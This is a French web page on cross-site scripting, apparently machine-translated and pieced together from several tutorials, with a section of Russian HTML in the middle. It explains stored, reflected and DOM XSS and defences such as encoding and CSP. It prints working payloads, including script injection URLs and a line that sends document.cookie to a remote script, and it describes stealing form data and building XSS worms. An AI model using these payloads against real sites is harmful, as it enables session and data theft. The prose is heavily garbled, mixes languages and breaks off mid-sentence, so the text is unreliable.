Cross-site XSS Scripting. Utiliser des vulnérabilités XSS au maximum. Supprimer votre propre code

Et est un manuel complet sur les scripts croisés.

Partie 1: Vue d'ensemble

Qu'est-ce que XSS?

Scrips en attente ( anglais Script de site internet) - Il s'agit d'une attaque visant à mettre en œuvre un code qui permet à un attaquant d'effectuer un javascript malveillant dans un autre navigateur utilisateur.

L'attaquant n'attaque pas directement son sacrifice. Au lieu de cela, il utilise une vulnérabilité de site Web visitant la victime et implémente un code javascript malveillant. Dans le navigateur de la victime, JavaScript malveillant est affiché comme une partie légitime du site Web, et le site Web lui-même agit comme un complice d'attaque directe.

Mise en œuvre du code JavaScript malveillant

La seule façon d'attaquer le lancement d'un javascript malveillant dans le navigateur de victime est de le présenter à l'une des pages que la victime est téléchargée à partir du site Web. Ceci est possible si le site Web permet aux utilisateurs de saisir des données sur leurs pages et que l'attaquant sera en mesure d'insérer une chaîne qui sera déterminée dans le cadre du code du navigateur de la victime.

L'exemple ci-dessous montre un script de serveur simple utilisé pour afficher le dernier commentaire sur le site:

imprimer " "
Imprimer "Dernier commentaire:"
Imprimer la base de données.LateScommande
Imprimer ""

Le script suppose que le commentaire ne consiste que de texte. Cependant, depuis l'immédiat entrée personnaliséeL'attaquant peut quitter ce commentaire: "". Tout utilisateur qui a visité la page recevra maintenant la réponse suivante:

Dernier commentaire:

Lorsque le navigateur de l'utilisateur charge la page, il effectuera tout, y compris le code JavaScript contenu dans les balises. . Cela suggère que la présence simple du script mis en œuvre par l'attaquant est un problème, quel que soit lequel le code de script particulier est réellement exécuté.

Deuxième partie: Attaque XSS

XSS Attack Participants

Avant de décrire comment décrire en détail comment fonctionne l'attaque XSS, nous devons identifier les sujets de l'attaque XSS. En général, dans l'attaque XSS, il y a trois participants: site Internet, victime, JE. cambrioleur.

Site Internet Donne des pages HTML pour les utilisateurs qui leur ont demandé. Dans nos exemples, il est situé à http: // site web /.
- Base de données de site Web C'est une base de données qui stocke certaines données saisies par les utilisateurs sur les pages du site.
Victime - c'est utilisateur normal Site Web qui demande des pages avec son navigateur.
Attaque - Ceci est un attaquant qui entend commencer une attaque pour la victime à l'aide de la vulnérabilité XSS sur le site.
- Serveur de cambrioleur - Il s'agit d'un serveur Web sous le contrôle d'un attaquant avec le seul but - vol d'informations de victime confidentielles. Dans nos exemples, il est situé à http: // attaquant /.

Exemple d'attaque de scénario

Ce script créera une demande HTTP à une autre URL, qui redirigera le navigateur de l'utilisateur sur le serveur d'attaquant. L'URL comprend des cookies victimes en tant que paramètre de requête lorsqu'une requête HTTP appartient au serveur d'attaquant, un attaquant peut extraire ces cookies de la demande. Après que l'attaquant ait reçu des cookies, il peut les utiliser pour se donner pour le sacrifice et commencer une attaque ultérieure.

À partir de ce point sur le code HTML ci-dessus sera appelé chaîne malveillante ou alors script malveillant. Il est important de comprendre que la chaîne elle-même est malveillante uniquement si elle est finalement traitée en tant que code HTML dans le navigateur de la victime, ce qui peut se produire uniquement si la vulnérabilité XSS est disponible sur le site Web.

Comment cet exemple fonctionne-t-il

Le schéma ci-dessous montre un exemple d'attaque par un attaquant:

L'attaquant utilise l'une des formes du site Web afin d'insérer une chaîne malveillante dans la base de données du site Web.
La victime demande à la page du site Web.
Le site inclut une chaîne malveillante de la base de données en réponse et l'envoie à la victime.
Le navigateur de victime effectue un scénario malveillant dans la réponse, envoyant des victimes au serveur d'attaquant.

Types XSSS.

Le but de l'attaque XSS est toujours dû au malveillant Script javascript Dans le navigateur de la victime. Il existe plusieurs façons fondamentalement différentes d'atteindre cet objectif. Les attaques XSS sont souvent divisées en trois types:

Stocké (permanent) XSSoù la chaîne malveillante provient de la base de données du site Web.
Réfléchis (non permanent) XSSoù une chaîne malveillante est générée à partir de la demande de la victime.
XSS DOM ModèlesLorsque la vulnérabilité se produit dans le code du côté du client, et non sur le côté du code du serveur.

Dans l'exemple précédent, l'attaque XSS stockée est montrée. Maintenant, nous décrivons deux autres types d'attaques XSS: réfléchies à des modèles XSS et XSS-Attack Dom.

XSS réfléchi.

Dans le cas d'une attaque réfléchie XSS, une chaîne malveillante fait partie de la demande de la victime au site Web. Le site reçoit et insère cette chaîne malveillante à l'utilisateur envoyé à l'utilisateur. Le schéma ci-dessous illustre ce script:

La victime envoie frauduleusement la demande d'URL au site Web.
Le site inclut une chaîne malveillante de la requête URL en réponse à la victime.
Le navigateur de la victime effectue un scénario malveillant contenu dans la réponse, envoyant des victimes au serveur Intruder.

Comment mener une attaque XSS réfléchie avec succès?

L'attaque réfléchie XSS peut sembler inoffensive, car elle nécessite la victime de son nom d'envoyer une demande contenant une chaîne malveillante. Puisque personne ne se attaquera volontairement, il semble qu'il n'y ait aucun moyen d'exécution réelle de l'attaque.

Comme il s'avère, il y a au moins deux manières courantes de faire le sacrifice pour démarrer une attaque réfléchie XSS contre elle-même:

Si l'utilisateur est une personnalité spécifique, un attaquant peut envoyer une URL malveillante à la victime (par exemple, à l'aide d'un courrier électronique ou d'une messagerie) et de tromper de la force à ouvrir un lien pour visiter le site Web.
Si l'objectif est un grand groupe d'utilisateurs, un attaquant peut publier un lien vers une URL malveillante (par exemple, sur son propre site Web ou dans réseau social) Et attendez les visiteurs qui ira sur le lien.

Ces deux méthodes sont similaires, et les deux peuvent être plus efficaces en utilisant des services pour "raccourcir" l'URL, ils dissimulent la chaîne malveillante des utilisateurs qui pourraient l'identifier.

XSS dans le modèle DOM

XSS dans le modèle DOM est une option en tant qu'attaque XSS stockée et réfléchie. Dans cette attaque XSS, la chaîne malveillante n'est pas traitée par le navigateur de la victime, jusqu'à ce que le vrai JavaScript du site Web soit exécuté. Le schéma ci-dessous illustre ce script pour les attaques de XSS réfléchies:

L'attaquant crée une URL contenant une chaîne malveillante et l'envoie à la victime.
La victime est frauduleuse par l'attaquant envoie la demande d'URL au site Web.
Le site reçoit une demande, mais n'inclut pas une chaîne malveillante en réponse.
Le navigateur de la victime effectue un scénario légitime contenu dans la réponse, entraînant script malveillant sera inséré dans la page.
Le navigateur de la victime effectue un script malveillant inséré dans la page, envoyant les cookies de la victime au serveur Intruder.

Quelle est la différence entre XSS dans le modèle DOM?

Dans des exemples précédents d'attaques XSS stockées et réfléchies, le serveur insère un script malveillant vers la page, qui est ensuite envoyé en réponse à la victime. Lorsque le navigateur de la victime a reçu une réponse, il suppose que le script malveillant fait partie du contenu légitime de la page et l'effectue automatiquement pendant le chargement de la page, ainsi que tout autre scénario.

Dans l'exemple d'attaques XSS dans le modèle DOM, le script malveillant n'est pas inséré dans le cadre de la page; Le seul script qui est automatiquement exécuté pendant la charge de la page est une partie légitime de la page. Le problème est que ce scénario légitime utilise directement l'entrée utilisateur afin d'ajouter HTML à la page. Étant donné que la chaîne malveillante est insérée dans la page à l'aide de InnerHTML, elle est analysée en tant que HTML, à la suite de laquelle le script nocif sera effectué.

Cette distinction est petite, mais très importante:

Dans XSS traditionnels, JavaScript malveillant est effectué lorsque la page est chargée, dans le cadre du HTML envoyé par le serveur.
Dans le cas de XSS dans le modèle DOM, JavaScript malveillant est effectué après avoir chargé la page, par conséquent, cette page avec un mode JavaScript légitime est appelé moyen peu sûr de l'entrée de l'utilisateur (contenant une chaîne malveillante).

Comment fonctionne XSS dans le modèle DOM?

Dans l'exemple précédent, il n'y a pas besoin de JavaScript; Le serveur peut générer tout HTML en soi. Si le code du côté serveur ne contient pas de vulnérabilités, le site Web ne serait pas soumis aux vulnérabilités XSS.

Cependant, étant donné que les applications Web deviennent de plus en plus avancées, une quantité croissante de pages HTML est générée à l'aide de JavaScript du côté client et non sur le serveur. À tout moment, le contenu doit changer sans mettre à jour la page entière, il est possible d'utiliser JavaScript. En particulier, c'est le cas lorsque la page est mise à jour après la requête Ajax.

Cela signifie que les vulnérabilités XSS peuvent être présentes non seulement dans la partie serveur du code de votre site, mais également sur le côté du code JavaScript du client de votre site. Par conséquent, même avec un code entièrement sécurisé du côté serveur, le code client peut toujours être activé en toute sécurité pour entrer les données utilisateur lors de la mise à jour du DOM après le téléchargement de la page. Si cela se produit, le code du client permettra à l'attaque XSS n'est pas le défaut du code du côté serveur.

XSS basé sur le modèle DOM peut être invisible pour le serveur

Il existe un cas particulier d'attaques XSS dans un modèle DOM dans lequel une chaîne malveillante n'est jamais envoyée au serveur de site Web: cela se produit lorsque la chaîne malveillante est contenue dans le fragment de l'identificateur d'URL (quelque chose après le numéro de symbole). Les navigateurs n'envoient pas cette partie de l'URL au serveur. Le site Web n'aura donc pas accès à l'aide du code du côté serveur. Cependant, le code du client lui a accès et il est donc possible de mener une attaque XSS par un traitement dangereux.

Ce cas ne se limite pas à l'identifiant de fragments. Il existe également une autre entrée utilisateur invisible pour le serveur, par exemple, de nouvelles fonctions HTML5, telles que localStorage et indexeddB.

Partie trois:
Prévention XSS

Méthodes de prévention XSS

Rappelez-vous que le XSS est une attaque du type de déploiement de code: l'utilisateur entré par l'utilisateur est interprété par erreur comme code de programme malveillant. Afin d'éviter ce type d'injection de code, un traitement d'entrée sécurisé est requis. Pour un développeur Web, il y a deux fondamentalement diverses méthodes Effectuer un traitement de saisie sécurisé:

Codage - Ceci est un moyen qui vous permet d'entrer des données par l'utilisateur uniquement en tant que données et ne permet pas le traitement du navigateur en tant que code.
Validation - Cette méthode filtre l'entrée de l'utilisateur afin que le navigateur l'interprète comme un code sans commandes malveillantes.

Bien que ce soit des méthodes fondamentalement différentes de prévention des XSS, elles ont plusieurs traits généraux qui sont importants pour la compréhension lors de l'utilisation de l'un d'entre eux:

Le traitement de l'entrée sécurisé de contexte doit être effectué différemment en fonction de l'utilisation de l'entrée de l'utilisateur sur la page. Le traitement de saisie sécurisé entrant / sortant peut être effectué lorsque votre site reçoit des données d'entrée (trafic entrant) ou directement avant que le site n'ensera une entrée personnalisée dans le contenu de la page (sortant). Le traitement de l'entrée sécurisé client / serveur peut être effectué sur le côté du client ou sur le côté serveur, chaque option est nécessaire dans différentes circonstances.

Avant d'expliquer les détails de la manière dont les œuvres de codage et de validation, nous décrivons chacun de ces éléments.

Traitement de l'utilisateur utilisateur dans des contextes

Il existe de nombreux contextes sur une page Web où une entrée personnalisée peut être appliquée. Des règles spéciales doivent être respectées pour chacune d'elles afin que l'entrée de l'utilisateur ne puisse pas "éclater" de son contexte et ne pouvait pas être interprétée comme un code malveillant. Vous trouverez ci-dessous les contextes les plus courants:

Quel est le sens des contextes?

Dans tous les contextes décrits, la vulnérabilité menant à XSS peut se produire si l'utilisateur saisi par l'utilisateur a été inséré dans le premier codage ou validation. Un attaquant peut introduire un code malveillant simplement insérant un séparateur de fermeture pour ce contexte et après son code malveillant.

Par exemple, si, à un moment donné, le site Web inclut la saisie des données par l'utilisateur directement dans l'attribut HTML, l'attaquant pourra mettre en place un script malveillant en démarrant son apport de devis, comme indiqué ci-dessous:

Cela pourrait être empêché, en supprimant simplement toutes les citations de l'utilisateur, et tout irait bien, mais seulement dans ce contexte. Si l'entrée a été insérée dans un autre contexte, le séparateur de fermeture diffère et l'injection deviendra possible. Pour cette raison, le traitement de l'entrée sécurisé doit toujours être adapté au contexte où l'entrée de l'utilisateur sera insérée.

Traitement entrant / entrant entrant / sortant

Instinctive, il peut sembler que des XSS puissent être empêchés de coder ou de valider toute la saisie de l'utilisateur, dès que notre site le reçoit. Ainsi, toutes les lignes malveillantes seront déjà neutralisées chaque fois qu'elles sont incluses dans la page, et les scripts de génération HTML ne doivent pas nécessairement s'occuper du traitement sécurisé de l'entrée de l'utilisateur.

Le problème est que tel que décrit précédemment par l'utilisateur entré par l'utilisateur peut être inséré dans plusieurs contextes de la page. Et non façon simple Déterminez lorsque la saisie de l'utilisateur est entrée dans le contexte - car elle sera éventuellement insérée, et la même entrée utilisateur doit souvent être insérée dans différents contextes. S'appuyant sur le traitement de l'entrée entrante pour prévenir les XSS, nous créons une solution très fragile qui sera soumise à des erreurs. (Outdated "Citations magiques" PHP sont un exemple d'une telle solution.)

Au lieu de cela, le traitement de l'entrée sortante doit être votre ligne de protection principale de XSS, car elle peut prendre en compte le contexte spécifique, lequel l'utilisateur saisi par l'utilisateur sera inséré. Dans une certaine mesure, la validation entrante peut être utilisée pour ajouter une couche de protection secondaire, mais cela plus tard.

Où il est possible d'effectuer un traitement de saisie de l'utilisateur sécurisé

Dans la plupart des applications Web modernes, la saisie de l'utilisateur est traitée à la fois sur le côté du code serveur et sur le côté du code client. Afin de protéger contre tous les types de XSS, le traitement de l'entrée sécurisé doit être exécuté à la fois dans le code du côté serveur et du côté du code client.

Afin de protéger contre les XSS traditionnels, le traitement de l'entrée sécurisé doit être effectué dans le code du côté serveur. Ceci est fait avec une langue prise en charge par le serveur.
Afin de protéger contre l'attaque XSS dans le modèle DOM, où le serveur ne reçoit jamais une chaîne malveillante (par exemple, l'attaque précédemment décrite via le fragment d'identifiant), le traitement de l'entrée sécurisé doit être effectué dans le code du côté du client. Ceci est fait avec JavaScript.

Maintenant, lorsque nous avons expliqué pourquoi le contexte compte, pourquoi la différence entre le traitement des intrants entrant et sortant est importante et pourquoi la sécurité de l'entrée sécurisée doit être effectuée des deux côtés et du côté du client et du côté serveur, nous pouvons continuer à expliquer Comment les deux types de traitement d'entrée sécurisé (codage et validation) sont réellement effectués.

Codage

Le codage est un moyen de sortir de la situation lorsqu'il est nécessaire que le navigateur d'entrée de l'utilisateur interprète uniquement en tant que données, et non de code. Le type de codage le plus populaire dans le développement Web est le masquage HTML qui convertit des caractères tels que < et > dans < et > respectivement.

Le pseudocode suivant est un exemple de la manière dont l'utilisateur saisi par l'utilisateur (Entrée personnalisée) peut être codé à l'aide du masquage HTML, puis inséré sur la page à l'aide du scénario du serveur:

imprimer " "
Imprimer "Dernier commentaire:"
Imprimer Encodehtml (UserInput)
Imprimer ""

Si l'utilisateur entre dans la ligne suivante Le HTML résultant ressemblera à ceci:

Dernier commentaire:

Étant donné que tous les symboles avec des valeurs spéciales ont été déguisés, le navigateur ne démontera aucune partie de l'entrée de l'utilisateur en tant que HTML.

Code de codage sur le côté client et le serveur

Lorsque vous codez sur le code de code du client, une langue javascript est toujours utilisée, qui comporte des fonctions intégrées qui codent des données pour différents contextes.

Lorsque vous effectuez un codage de votre code sur le côté serveur, vous vous appelez sur les fonctionnalités disponibles dans votre langue ou votre framework. à cause de grand nombre Langues et cadres disponibles donnés didacticiel Il ne couvrira pas les détails de codage dans un serveur ou un cadre particulier. Néanmoins, les fonctions de codage JavaScript utilisés sur le côté client sont également utilisées lors de l'écriture du code du côté serveur.

Codage du côté du client

Lors de l'encodage d'une entrée client personnalisée à l'aide de JavaScript, il existe plusieurs méthodes et propriétés intégrées qui codent automatiquement toutes les données dans un style dépendant du contextuel:

Le dernier contexte déjà mentionné ci-dessus (valeurs de JavaScript) n'est pas inclus dans cette liste, car JavaScript ne fournit pas de méthode de codage de données intégrée, qui sera activée dans le code source JavaScript.

Restrictions de codage

Même lors de l'encodage, il est possible d'utiliser des lignes malveillantes dans certains contextes. Un exemple lumineux en est lorsque la saisie de l'utilisateur est utilisée pour fournir l'URL, par exemple, dans l'exemple ci-dessous:

document.QuerySelector ("a"). Href \u003d userinput

Bien que la valeur spécifiée dans la propriété d'élément HREF le code automatiquement de sorte qu'elle ne devient pas plus que la valeur d'attribut, celle-ci n'interfère pas avec l'attaquant Insérer une URL à partir de "JavaScript:". Lorsque vous cliquez sur le lien, quelle que soit la construction, le JavaScript intégré à l'intérieur de l'URL sera exécuté.

Le codage n'est également pas une solution efficace lorsque vous souhaitez que les utilisateurs utilisent une partie des codes HTML sur la page. Un exemple est la page de profil de l'utilisateur, où l'utilisateur peut utiliser l'utilisateur HTML. Si ce HTML habituel est codé, la page de profil ne sera en mesure que du texte simple.

Dans de telles situations, le codage doit être complété par la validation avec laquelle nous allons apprendre à connaître davantage.

Validation

La validation est un acte de filtrage de l'entrée de l'utilisateur afin que toutes les pièces malveillantes soient supprimées sans la nécessité de supprimer tout le code. L'un des types de vérification les plus utilisés dans le développement Web vous permet d'utiliser des éléments HTML (par exemple, et ) Mais l'inverse d'autres (par exemple,

Avec une stratégie CSP correctement spécifique, le navigateur ne peut pas télécharger et exécuter des scripts malveillants.js car http: // attaquant / non spécifié comme source fiable. Même si le site n'a pas réussi à traiter en toute sécurité l'entrée de l'utilisateur dans ce cas, la politique du SCSP a empêché la vulnérabilité et provoque des préjudice.

Même si l'attaquant injecté par le code dans le code du scénario, et non par référence au fichier externe, la stratégie CSP correctement configurée désactivera également l'injection dans le code JavaScript empêchant la vulnérabilité et entraînant tout problème.

Comment activer le CSP?

Par défaut, les navigateurs n'utilisent pas de CSP. Pour activer SCP sur votre site Web, les pages doivent contenir un en-tête HTTP supplémentaire: Politique de sécurité de contenu. Toute page contenant ce titre appliquera des stratégies de sécurité tout en démarrant un navigateur, à condition que le navigateur prend en charge le CSP.

Étant donné que la stratégie de sécurité est envoyée avec chaque réponse HTTP, il est possible d'installer individuellement une stratégie sur le serveur individuellement pour chaque page. La même politique peut être appliquée sur l'ensemble du site Web, insérant le même en-tête CSP dans chaque réponse.

Le contenu de l'en-tête Content-Security-Policy contient une chaîne définissant une ou plusieurs stratégies de sécurité qui fonctionneront sur votre site. La syntaxe de cette chaîne sera décrite ci-dessous.

Exemples d'en-têtes Cette section utilise le transfert de lignes et de retenues pour la simplicité de la perception; Ils ne doivent pas être présents dans l'en-tête actuel.

Syntaxe csp

La syntaxe de l'en-tête CSP ressemble à ceci:

Contenu-Security-Politique:
directif expression source, expression source, ...;
directif ...;
...

Cette syntaxe se compose de deux éléments:

Directives (directives) Présentation des lignes indiquant le type de ressource extrait de la liste spécifiée.

Expressions source Il s'agit d'un modèle décrivant un ou plusieurs serveurs d'où les ressources peuvent être téléchargées.

Pour chaque directive, les données de l'expression source déterminent quelles sources peuvent être utilisées pour charger les ressources du type approprié.

Directif

Les directives suivantes peuvent être utilisées dans l'en-tête CSP:

connect-src.

fONT-SRC.

cadre-src.

img-src.

media-src.

objet-src.

script-src.

style-src.

En outre, la directive spéciale par défaut-SRC peut être utilisée pour assurer la valeur par défaut pour toutes les directives non incluses dans le titre.

Expression de la source

La syntaxe pour créer une expression de la source est la suivante:

protocole: // Nom de l'hôte: numéro de port

Le nom d'hôte peut commencer par *, cela signifie que tout sous-domaine du nom d'hôte fourni sera résolu. De même, le numéro de port peut être représenté comme *, cela signifie que tous les ports seront résolus. De plus, le protocole et le numéro de port peuvent être manqués. Si le protocole n'est pas spécifié, la stratégie nécessitera que toutes les ressources soient chargées à l'aide de HTTPS.

En plus de la syntaxe ci-dessus, l'expression de la source peut être l'une des quatre comme une alternative mots clés Avec une valeur spéciale (citations sont incluses):
"Aucun" interdit les ressources. "Self" permet aux ressources de l'hôte sur lequel se trouve la page Web. "insectif-inline" permet aux ressources contenues sur la page comme intégré
En quelque sorte pas très effrayant :) Qu'est-ce qui peut vraiment être dangereux cette vulnérabilité?
Passif et actif
Il existe deux types de vulnérabilités XSS - passif et actif.
Vulnérabilité active Plus dangereux, comme un attaquant n'a pas besoin d'attirer le sacrifice sur un lien spécial, il suffit à lui de mettre en œuvre le code dans la base ou dans un fichier sur le serveur. Ainsi, tous les visiteurs du site deviennent automatiquement des victimes. Il peut être intégré, par exemple, en incorporant le code SQL (injection SQL). Par conséquent, vous ne devez pas faire confiance aux données stockées dans la base de données, même si dans l'insert, ils ont été traités.
Exemple vulnérabilité passive Vous pouvez voir au tout début de l'article. Il existe déjà des ingénieurs sociaux, par exemple, une lettre importante de l'administration du site vous demandant de vérifier les paramètres de votre compte, après la récupération de la sauvegarde. En conséquence, vous devez connaître l'adresse de la victime ou simplement organiser une lettre d'information sur le spam ou placer un poste sur un forum, et pas encore le fait que les victimes soient naïves et vont à votre lien.
De plus, des vulnérabilités passives peuvent être soumises à la fois au poste et à obtenir des paramètres. Avec des paramètres post-paramètres, il sera compris, vous devrez faire des astuces. Par exemple, la redirection du site intrus.

">

Par conséquent, la vulnérabilité d'obtenir est un peu plus dangereuse, car La victime est plus facile de remarquer le mauvais domaine que le paramètre supplémentaire (bien que l'URL puisse être codée du tout).
Biscuits
C'est l'exemple le plus fréquemment cité des attaques XSS. Dans les sites de cookies stocker parfois toutes les informations précieuses (parfois même la connexion et le mot de passe (ou son hachage) de l'utilisateur), mais le plus dangereux est le vol d'une session active, alors n'oubliez pas d'appuyer sur le lien "Quitter" sur les sites, même si cela ordinateur de famille. Heureusement, dans la plupart des ressources, la durée de vie de la session est limitée.
var іmg \u003d nouvelle image (); Іmg.sps \u003d "http: //site/xss.php?" + document.cookie;
Par conséquent, les restrictions de domaine sur XMLHTTPRequest, mais l'attaquant n'est pas effrayant car il y a , <img>, <script>, background:url(); и т.п.</p><h3>Кража данных из форм</h3><p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p><p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p><h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3><p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><h3>Подделка межсайтовых запросов (CSRF/XSRF)</h3><p>Также имеет косвенное отношение к XSS. Вообще это отдельный тип уязвимости, но часто используется совместно с XSS. Суть заключается в том, что пользователь, авторизированный на неуязвимом сайте, заходит на уязвимый (или специальную страницу злоумышленника), с которого отправляется запрос на совершение определенных действий.</p><p>Грубо говоря, в идеале это должно быть так. Пользователь авторизировался в системе платежей. Потом зашел на сайт злоумышленника или сайт с XSS-уязвимостью, с которого отправился запрос на перевод денег на счет злоумышленника.</p><p>Поэтому большинство сайтов при совершении определенных действий пользователя (например, смена e-mail) переспрашивают пароль или просят ввести код подтверждения.</p><h3>XSS-черви</h3><p>Этот тип атаки появился, наверное, благодаря соцсетям, таким как Вконтакте и Twitter. Суть в том, что нескольким пользователям соцсети посылается ссылка с XSS-уязвимостью, когда они перейдут по ссылке, то интегрированный скрипт рассылает сообщения другим пользователям от их имени и т.д. При этом могут совершаться и другие действия, например отсылка личных данных жертв злоумышленнику.</p><h3>Безобидный XSS</h3><p>Интересно, что счетчики по своей сути тоже являются в некотором роде активной XSS-атакой. Ведь на сторонний сервер передаются данные о посетителе, как, например, его IP-адрес, разрешение монитора и т.п. Только код в свою страничку вы интегрируете по собственной воле:) Взгляните, например, на код Google Analytic.</p> <p>Межсайтовый скриптинг (XSS) - это уязвимость, которая заключается во внедрении кода, исполняемого на стороне клиента (JavaScript) в веб-страницу, которую просматривают другие пользователи.</p> <p>Уязвимость возникает из-за недостаточной фильтрации данных, которые пользователь отправляет для вставки в веб-страницу. Намного проще понять на конкретном пример. Вспомните любую гостевую книгу - это программы, которые предназначены для принятия данных от пользователя и последующего их отображения. Представим себе, что гостевая книга никак не проверяет и не фильтрует вводимые данные, а просто их отображает.</p> <p>Можно набросать свой простейший скрипт (нет ничего проще, чем писать плохие скрипты на PHP - этим очень многие занимаются). Но уже предостаточно готовых вариантов. Например, я предлагаю начать знакомство с Dojo и OWASP Mutillidae II. Там есть похожий пример. В автономной среде Dojo перейдите в браузере по ссылке: http://localhost/mutillidae/index.php?page=add-to-your-blog.php</p> <p>Если кто-то из пользователей ввёл:</p><p>То веб-страница отобразит:</p><p>Привет! Нравится твой сайт. </p><p>А если пользователь введёт так:</p><p>Привет! Нравится твой сайт.<script>alert("Pwned")</script> </p><p>Qui sera affiché comme ceci:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x02-6.jpg.pagespeed.ic.1-A3eqySoq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Les navigateurs gardent les nombreux cookies d'un grand nombre de sites. Chaque site peut obtenir des cookies seulement sauvegardés. Par exemple, le site Web d'exemple.com a conservé des cookies dans votre navigateur. Vous êtes le crash sur le site d'un autre.com, ce site (scripts client et serveur) ne peut pas accéder aux cookies que le site Web d'Exemple.com a été enregistré.</p> <p>Si le site Exemple.com est vulnérable à XSS, cela signifie que nous pouvons en une manière ou une autre pour implémenter le code JavaScript dans celui-ci et ce code sera exécuté pour le compte de l'exemple de site.com! Ceux. Ce code recevra, par exemple, l'accès à l'exemple de site de Cookis.</p> <p>Je pense que tout le monde se souvient que JavaScript est exécuté dans les navigateurs d'utilisateurs, c'est-à-dire S'il y a des XSS, les logiciels malveillants intégrés reçoivent l'accès aux données utilisateur qui ont ouvert la page du site Web.</p> <p>Le code incorporé est capable de tout ce que JavaScript peut, à savoir:</p> <ul><li>accès aux cookies du site Vue</li> <li>peut apporter des changements dans <a href="https://ilyarm.ru/fr/obzor-highscreen-yummy-duo-smartfon-s-dvumya-sim-kartami-i-bolshim.html">apparence</a> pages</li> <li>accès au tampon d'échange</li> <li>peut implémenter des programmes sur JavaScript, par exemple, Ki-Loggers (intercepteurs de touches poussées)</li> <li>touchez sur le boeuf.</li> <li>et etc.</li> </ul><p>L'exemple le plus simple avec Cookiz:</p><p> <script>alert(document.cookie)</script> </p><p>En fait, <b>alerte.</b> Utilisé uniquement pour détecter les XSS. Real Malware Libre des charges cachées. Il est caché de se lier à un serveur d'intrusion distant et transmet des données volées dessus.</p> <h2>Types de XSS. <br></h2> <p>La chose la plus importante est que vous devez comprendre les types de XSS ce qu'ils se produisent:</p> <ul><li>Stocké (constant)</li> <li>Réfléchie (non permanent)</li> </ul><p>Exemple de permanent:</p> <ul><li>Un attaquant a introduit un message spécialement formé au livre d'or (commentaire, message du forum, profilé) qui est stocké sur le serveur, chargé à partir du serveur chaque fois que les utilisateurs demandent l'affichage de cette page.</li> <li>L'attaquant a eu accès aux données du serveur, par exemple à travers <a href="https://ilyarm.ru/fr/instrukciya-po-ispolzovaniyu-jsql-injection-mnogofunkcionalnogo-instrumenta.html">Injection SQL</a>et mis en place un code javascript malveillant aux données émises par l'utilisateur (avec ki-décorateurs ou boeuf).</li> </ul><p>Échantillon de non-permanent:</p> <ul><li>Le site a une recherche, qui, avec les résultats de la recherche, montre quelque chose comme "que vous recherchiez: [String de recherche]", tandis que les données ne sont pas filtrées correctement. Étant donné qu'une telle page ne s'affiche que pour avoir un lien avec elle, tandis que l'attaquant n'enverra pas le lien vers d'autres utilisateurs du site, l'attaque ne fonctionnera pas. Au lieu d'envoyer une référence à la victime, vous pouvez utiliser le placement d'un script malveillant sur un site neutre visitant la victime.</li> </ul><p>Toujours se démarquer (certains comme une sorte de vulnérabilités XSS non permanente, certains disent que cette espèce peut être une variété de XSS constants):</p> <ul><li>Modèle DOM</li> </ul><h2>Caractéristiques XSS basées sur DOM <br></h2> <p>Si vous êtes tout à fait simple, le code malveillant du code XSS non permanent ne peut être vu si vous ouvrez le code HTML. Par exemple, le lien est formé de cette manière:</p><p>Http://example.com/search.php?q\u003d "/\u003e<script>alert(1)</script> </p><p>Et lors de l'ouverture du code HTML d'origine, nous voyons quelque chose comme ceci:</p><p> <div class="m__search"> <form method="get" action="/search.php"> <input type="text" class="ui-input query" name="q" value=""/><script>alert(1)</script>" /> <button type="submit" class="ui-button">Trouver</button> </form> </p><p>Et DOM XSS change la structure DOM formée dans le navigateur à la volée et voir le code malveillant que nous ne puissions que lors de la visualisation de la structure DOM formée. HTML ne change pas. Prenons ce code par exemple:</p><p> <!DOCTYPE html> <html> <head> <title>site ::: Dom XSS</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <div id="default"> Une erreur s'est produite ...</div> <script> function OnLoad() { var foundFrag = get_fragment(); return foundFrag; } function get_fragment() { var r4c = "(.*?)"; var results = location.hash.match(".*input=token(" + r4c + ");"); if (results) { document.getElementById("default").innerHTML = ""; return (unescape(results)); } else { return null; } } display_session = OnLoad(); document.write("Your session ID was: " + display_session + "<br><br>") </script> </body> </html> </p><p>Que dans le navigateur, nous verrons:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x04-4.jpg.pagespeed.ic.NGlOliWXIq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Code source de page:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x05-3.jpg.pagespeed.ic.qvLGDO0bJf.jpg' width="100%" loading=lazy loading=lazy></p> <p>Formulons l'adresse comme suit:</p><p>Http: //localhost/tests/xss/dom_xss.html#input\u003dtokenalex.<script>alert(1)</script>; </p><p>Maintenant, la page ressemble à ceci:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x06-4.jpg.pagespeed.ic.7nnJOHKoux.jpg' width="100%" loading=lazy loading=lazy></p> <p>Mais regardons le code source HTML:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x07-2.jpg.pagespeed.ic.5mMwWD0W90.jpg' width="100%" loading=lazy loading=lazy></p> <p>Il n'y avait absolument rien changé. À propos de cela, j'ai dit, nous devons regarder le document Dom Structure pour identifier le code malveillant:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x08-3.jpg.pagespeed.ic.RVBIMU0n3H.jpg' width="100%" loading=lazy loading=lazy></p> <p>Voici un prototype de travail XSS, pour une attaque réelle, nous avons besoin d'une charge utile plus complexe impossible en raison du fait que l'application cesse de lire immédiatement après un point avec une virgule et quelque chose du genre <b>alerte (1); alerte (2)</b> N'est plus possible. Cependant, grâce à <b>unescape ()</b> Dans les données retournées, nous pouvons utiliser la charge utile comme celle-ci:</p><p>Http: //localhost/tests/xss/dom_xss.html#input\u003dtokenalex.<script>alert(1)%3balert(2)</script>; </p><p>Où nous avons remplacé le symbole <b>; </b> Sur l'équivalent codé dans l'URI!</p> <p>Nous pouvons maintenant écrire un 